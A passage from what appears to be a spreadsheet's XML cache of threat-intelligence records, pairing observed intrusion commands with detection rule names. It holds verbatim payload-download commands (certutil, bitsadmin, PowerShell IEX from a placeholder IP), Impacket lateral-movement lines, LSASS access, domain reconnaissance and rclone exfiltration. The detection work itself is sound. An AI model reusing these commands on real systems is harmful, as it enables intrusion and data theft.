    <x v="230"/>
    <s v="psexec-pid"/>
    <x v="11"/>
    <s v="42c575ea-e41e-41f1-b248-8093c3e82a28 : PsExec Service Installation"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="231"/>
    <m/>
    <x v="11"/>
    <s v="8eef149c-bd26-49f2-9e5a-9b00e3af499b : Pass the Hash Activity 2"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="232"/>
    <m/>
    <x v="11"/>
    <s v="192a0330-c20b-4356-90b6-7b7049ae0b8 : Successful Overpass the Hash Attempt"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="233"/>
    <m/>
    <x v="11"/>
    <s v="d7662ff6-9e97-4596-a61d-9839e32dee8d : Add SafeBoot Keys Via Reg Utility"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="234"/>
    <m/>
    <x v="11"/>
    <s v="cc36992a-4671-4f21-a91d-6c2b72a2edf5 : Suspicious Eventlog Clearing or Configuration Change Activity"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="235"/>
    <s v="vss-pid"/>
    <x v="11"/>
    <s v="c947b146-0abc-4c87-9c64-b17e9d7274a2 : Shadow Copies Deletion Using Operating Systems Utilities"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="236"/>
    <m/>
    <x v="11"/>
    <s v="dcd74b95-3f36-4ed9-9598-0490951643aa : PowerView PowerShell Cmdlets - ScriptBlock"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="237"/>
    <m/>
    <x v="12"/>
    <s v="ETPRO JA3 Hash - Possible Ligolo Server/Golang Binary Response_x000a_ET USER_AGENTS Go HTTP Client User-Agent_x000a_ET POLICY SMB2 NT Create AndX Request For an Executable File_x000a_ET POLICY SMB Executable File Transfer_x000a_ET POLICY PsExec service created_x000a_ET RPC DCERPC SVCCTL - Remote Service Control Manager Access_x000a_ET POLICY Command Shell Activity Over SMB - Possible Lateral Movement_x000a_ET POLICY Powershell Activity Over SMB - Likely Lateral Movement_x000a_ET POLICY SMB2 NT Create AndX Request For a .bat File_x000a_ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection_x000a_ET POLICY SMB2 NT Create AndX Request For a DLL File - Possible Lateral Movement_x000a_ET INFO Suspected Impacket WMIExec Activity_x000a_ET INFO Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)_x000a_ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection_x000a_ET HUNTING Terse Unencrypted Request for Google - Likely Connectivity Check_x000a_ETPRO USER_AGENTS Observed Suspicious UA (Mozilla/5.0)"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <x v="238"/>
    <s v="netscan-pid"/>
    <x v="13"/>
    <s v="Softperfect Netscan"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="239"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;r''' &quot;c:\windows\system32\wscript.exe&quot; C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs&quot; ''', &quot;initiating_process_command_line&quot;: r''' C:\windows\Explorer.exe'''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="240"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;r''' &quot;c:\windows\system32\regsvr32.exe&quot; c:\windows\temp\03070-1.dll ''', &quot;initiating_process_command_line&quot;: r''' &quot;c:\windows\system32\wscript.exe&quot; C:\users\&lt;&gt;\ApData\Local\Temp\&lt;&gt;.zip\Document[2023.10.11_08-07].vbs&quot;'''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="241"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: &quot;r''' cmd /c rundll32.exe c:\Users\&lt;&gt;\AppDataRoaming\&lt;&gt;{40502BA4-3D3D-8C90-*C72-2D965AA9FD9B} \iwiqocacod.dll,#1''', &quot;initiating_process_command_line&quot;: r''' &quot;c:\windows\system32\regsvr32.exe&quot; c:\windows\temp\03070-1.dll '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="242"/>
    <m/>
    <x v="3"/>
    <s v="c:\windows\system32\msiexec.exe /I %LOCALAPPDATA%\TEMP\setup.msi"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="243"/>
    <m/>
    <x v="3"/>
    <s v="wmiexec.py"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="244"/>
    <m/>
    <x v="1"/>
    <s v="impacket"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="245"/>
    <m/>
    <x v="4"/>
    <s v="c:\Program Files (x86)\ScreenConnect Client (82d6a046a146cb1)\screenconnect.clientservice.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="246"/>
    <m/>
    <x v="3"/>
    <s v="bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="247"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' bitsadmin /transfer mydownloadjob /download /priority normal http://&lt;IP&gt;:80/download/test1.exe c:\programdata\s1.exe ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\210bd2ae-32f2-43e6-8e64-09d61ff22ec1run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="248"/>
    <s v="certutil-pid"/>
    <x v="3"/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="249"/>
    <s v="certutil-pid"/>
    <x v="3"/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="250"/>
    <s v="certutil-pid"/>
    <x v="3"/>
    <s v="certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="251"/>
    <s v="certutil-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/test1.exe C:\programdata\cscs.exe ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="252"/>
    <s v="certutil-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/http64.exe C:\programdata\cscs.exe ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="253"/>
    <s v="certutil-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''certutil -urlcache -split -f http://&lt;IP&gt;:80/download/csss.exe C:\programdata\cscs.exe ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="254"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaid'))&quot; ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="255"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''powershell invoke-webrequest 'http://temp.sh/VSIAV/http64.exe&quot; -OutFile C:programdata\rr.exe''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="256"/>
    <m/>
    <x v="3"/>
    <s v="powershell Invoke-WebRequest &quot;http://temp.sh/VSlAV/http64.exe&quot; -OutFile C:\programdata\rr.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="257"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' c:\windows\system32\rundll32.exe ''', &quot;intiating_process_command_line&quot;: r''' powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="258"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksajSK'))&quot; ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="259"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' c:\windows\system32\cmd.exe /c regsvr32.exe https64.dll,Start ''', &quot;intiating_process_command_line&quot;: r''' powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="260"/>
    <s v="pshell-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' c:\windows\system32\cmd.exe /c regsvr32 https64.dll,Start ''', &quot;intiating_process_command_line&quot;: r''' powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="261"/>
    <m/>
    <x v="0"/>
    <s v="\postex_22a3 "/>
    <s v="defualt pipe name"/>
    <x v="8"/>
  </r>
  <r>
    <x v="262"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="263"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="264"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd c/programdata 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="265"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="266"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd goat.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="267"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c quser 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="268"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c cd dir1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="269"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="270"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c del db.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="271"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c del sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="272"/>
    <m/>
    <x v="3"/>
    <s v="cmd.exe /Q /c sp.exe 1&gt; \\127.0.0.1\ADMIN$\__&lt;timestamp&gt; 2&gt;&amp;1"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="273"/>
    <m/>
    <x v="0"/>
    <s v="csharpstreamer used"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="274"/>
    <m/>
    <x v="0"/>
    <s v="inject into winlogon.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="275"/>
    <m/>
    <x v="0"/>
    <s v="inject into rundll32"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="276"/>
    <m/>
    <x v="0"/>
    <s v="NtAllocateVirtualMemoryRemoteApiCall"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="277"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;NtAllocateVirtualMemory&quot;, &quot;process_name&quot;: r''' rundll32.exe ''', &quot;intiating_process_command_line&quot;: r''' powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="278"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;NtAllocateVirtualMemory&quot;, &quot;process_name&quot;: r''' winlogon.exe ''', &quot;intiating_process_command_line&quot;: r''' powershell.exe -nop -w hidden -c &quot; IEX ((new-object net.webclient).downloadstring('http://&lt;IP&gt;:80/ksaajSk'))&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="279"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c del db.exe 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="280"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;:  &quot;process_create&quot;, &quot;process_command_line&quot;: r''' cmd.exe /Q /c del sp.exe 1&gt; \\127.0.0.1\ADMIN$\__16994603381.0200245 2&gt;&amp;1 ''', &quot;initiating_process_command_line&quot;: &quot;c:\windows\system32\wbem\wmiprvse.exe -secured -Embedding&quot;}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="281"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_access&quot;, &quot;source_process_path&quot;: &quot;c:\Tools\cslite.exe&quot;, &quot;target_process_path&quot;: &quot;c:\Windows\system32\lsass.exe&quot;, &quot;access&quot;: &quot;0x1010&quot;}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="282"/>
    <m/>
    <x v="0"/>
    <s v="UNKNOWN Call Trace "/>
    <s v="Another data point to look for is the UNKNOWN string in the CallTrace, which indicates Sysmon was not able to resolve the address of code from where the OpenProcessfunction was called, potential indication of a DLL in memory."/>
    <x v="8"/>
  </r>
  <r>
    <x v="283"/>
    <m/>
    <x v="0"/>
    <s v="In another instance, we saw LSASS being accessed by WerFault.exe, with PROCESS_ALL_ACCESS granted. This should happen rarely in a production environment, and once again, the CallTrace can also help as CallTrace with ntdll.dll, dbghelp.dll or dbgcore.dll"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="284"/>
    <m/>
    <x v="0"/>
    <s v="dcsync"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="285"/>
    <m/>
    <x v="13"/>
    <s v="cmd.exe /c chcp &gt;&amp;2"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="286"/>
    <m/>
    <x v="0"/>
    <s v="looking for the Domain-DNS Class(object) — Schema GUID: 19195a5b-6da0–11d0-afd3–00c04fd930c9 and DS-Replication-Get-Changes-All — Schema GUID: 1131f6ad-9c07–11d1-f79f-00c04fc2dcd2 as explained in this SpectreOps post, to detect this dcsync activity. Using these two points of evidence, we can say with good confidence that the threat actor performed a dcsync operation."/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="287"/>
    <s v="ipconfig-pid"/>
    <x v="3"/>
    <s v="ipconfig /all"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="288"/>
    <m/>
    <x v="3"/>
    <s v="systeminfo"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="289"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net config workstation"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="290"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest /domain_trusts"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="291"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="292"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net view /all /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="293"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net view /all"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="294"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="295"/>
    <s v="nltest-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' nltest /dclist ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="296"/>
    <s v="netclt-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' net group &quot;domain admins&quot; /domain''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="297"/>
    <s v="netclt-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' net group &quot;Domain Computers&quot; /domain''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="298"/>
    <s v="netclt-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' net group &quot;domain admins&quot; /domain''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="299"/>
    <s v="netclt-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' net group &quot;domain admins&quot; /domain''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="300"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' net group &quot;enterprise admins&quot; /domain''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="301"/>
    <s v="nltest-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' nltest /dclist ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="302"/>
    <s v="nltest-pid"/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' nltest /dclist ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="303"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' route print ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="304"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' systeminfo ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="305"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' ipconfig /all ''', &quot;intiating_process_command_line&quot;: r''' cmd /c &quot;C:\windows\temp\screenconnect\23.6.8.8644\&lt;random uuid&gt;run.cmd&quot; '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="306"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest  /dclist:"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="307"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="308"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="309"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="310"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;enterprise admins&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="311"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest  /dclist:"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="312"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;domain admins&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="313"/>
    <m/>
    <x v="3"/>
    <s v="quser"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="314"/>
    <s v="ipconfig-pid"/>
    <x v="3"/>
    <s v="ipconfig  /all"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="315"/>
    <s v="netclt-pid"/>
    <x v="3"/>
    <s v="net  group &quot;domain computers&quot; /domain"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="316"/>
    <m/>
    <x v="3"/>
    <s v="systeminfo"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="317"/>
    <m/>
    <x v="3"/>
    <s v="route  print"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="318"/>
    <s v="nltest-pid"/>
    <x v="3"/>
    <s v="nltest  /dclist:"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="319"/>
    <s v="netscan-pid"/>
    <x v="3"/>
    <s v="C:\users\&lt;&gt;\Desktop\netscan.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="320"/>
    <s v="netscan-pid"/>
    <x v="3"/>
    <s v="C:\users\&lt;&gt;\Desktop\64-bit\netscan.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="321"/>
    <m/>
    <x v="0"/>
    <s v="scan 445, 3389, 135"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="322"/>
    <m/>
    <x v="1"/>
    <s v="confucius_cpp.exe"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="323"/>
    <m/>
    <x v="0"/>
    <s v="(&amp;(objectClass=computer))"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="324"/>
    <m/>
    <x v="0"/>
    <s v="Set WshShell = CreateObject(&quot;WScript.Shell&quot;)_x000a_WshShell.Run chr(34) &amp; &quot;c:\programdata\rcl.bat&quot; &amp; Chr(34), 0_x000a_Set WshShell = Nothing"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="325"/>
    <s v="rclone-pid"/>
    <x v="3"/>
    <s v="rclone config"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="326"/>
    <s v="rclone-pid"/>
    <x v="3"/>
    <s v="rclone copy"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="327"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''cmd /c wmic /node:&lt;host&gt; process call create &quot;C:\setup.exe&quot; ''', &quot;intiating_process_command_line&quot;: r''' c:\windows\System32\cmd.exe '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="328"/>
    <m/>
    <x v="3"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''XCOPY /f /y &quot;c:\programdata\setup.exe&quot; &quot;\\&lt;ip&gt;\C$ ''', &quot;intiating_process_command_line&quot;: r''' c:\windows\System32\cmd.exe '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="329"/>
    <m/>
    <x v="9"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''cmd /c wmic /node:&lt;host&gt; process call create &quot;C:\programdata\&lt;random&gt;.exe &quot; ''', &quot;intiating_process_command_line&quot;: r''' c:\windows\System32\cmd.exe '''}"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="330"/>
    <m/>
    <x v="0"/>
    <s v="wmiprvSE.exe executed c:\programdata\bnufuomft2.exe on host"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="331"/>
    <m/>
    <x v="10"/>
    <s v="8a0d153f-b4e4-4ea7-9335-892dfbe17221: NetScan Share Enumeration Write Access Check_x000a_dfbdd206-6cf2-4db9-93a6-0b7e14d5f02f: CHCP CodePage Locale Lookup_x000a_7019b8b4-d23e-4d35-b5fa-192ffb8cb3ee: Use of Rclone to exfiltrate data over an SSH channel_x000a_a09079c2-e4af-4963-84d2-d65c2fb332f5: Detection of CertUtil Misuse for Malicious File Download_x000a_6f77de5c-27af-435b-b530-e2d07b77a980: Impacket Tool Execution_x000a_6fc673ac-ec2f-4de8-8a14-a395f1b2b531: Potential CSharp Streamer RAT loading binary from APPDATA_x000a_879ddba7-5cb9-484f-88a4-c1d87034166f: Suspicious ScreenConnect Script Execution"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="332"/>
    <m/>
    <x v="11"/>
    <s v="90f138c1-f578-4ac3-8c49-eecfd847c8b7: BITS Transfer Job Download From Direct IP"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="333"/>
    <m/>
    <x v="11"/>
    <s v="10c14723-61c7-4c75-92ca-9af245723ad2: HackTool - Potential Impacket Lateral Movement Activity"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="334"/>
    <m/>
    <x v="11"/>
    <s v="b1f73849-6329-4069-bc8f-78a604bb8b23: Remote Access Tool - ScreenConnect Remote Command Execution"/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <x v="335"/>
    <m/>
    <x v="11"/>
